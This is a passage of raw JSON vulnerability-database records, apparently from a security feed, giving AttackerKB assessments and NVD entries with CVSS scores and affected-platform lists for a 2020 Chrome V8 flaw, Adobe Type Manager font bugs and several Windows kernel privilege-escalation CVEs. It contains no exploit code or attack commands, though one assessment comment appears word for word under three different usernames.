for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**tekwizz123** at March 09, 2020 2:14am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**kevthehermit** at March 04, 2020 4:01pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**gwillcox-r7** at November 22, 2020 2:19am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-07-30T00:00:00", "id": "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66", "href": "https://attackerkb.com/topics/lMn6eEE22f/cve-2020-6418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-20T20:12:53", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-1027", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2020-07-24T00:00:00", "id": "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49", "href": "https://attackerkb.com/topics/y0GBp0P90z/cve-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:47:38", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-0938", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-13T16:00:28", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1020", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2020-1020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-31T19:21:07", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "cve", "title": "CVE-2020-6418", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-03-31T17:12:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2020-6418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:09", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1000, CVE-2020-1003, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-0913", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0913", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:31", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1003", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1003", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:58", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1003, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1000", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2020-1000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1000", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-09-30T17:06:46", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1027", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2022-09-30T13:30:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809"], "id": "CVE-2020-1027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 